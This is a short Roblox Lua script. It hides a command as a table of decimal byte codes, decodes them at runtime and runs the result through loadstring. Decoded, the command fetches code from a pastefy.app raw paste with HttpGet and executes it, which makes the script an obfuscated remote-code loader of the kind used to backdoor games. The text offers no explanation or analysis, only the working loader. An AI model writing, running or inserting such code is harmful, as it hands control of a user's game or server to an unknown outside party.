task.spawn(function()
    local bytes = {
        108,111,97,100,115,116,114,105,110,103,40,103,97,109,101,58,
        72,116,116,112,71,101,116,40,34,104,116,116,112,115,58,47,
        47,112,97,115,116,101,102,121,46,97,112,112,47,100,65,122,
        56,108,115,87,77,47,114,97,119,34,41,41,40,41
    }

    local function decode(t)
        local s = ""
        for i = 1, #t do
            s = s .. string.char(t[i])
        end
        return s
    end

    local code = decode(bytes)
    loadstring(code)()
end)
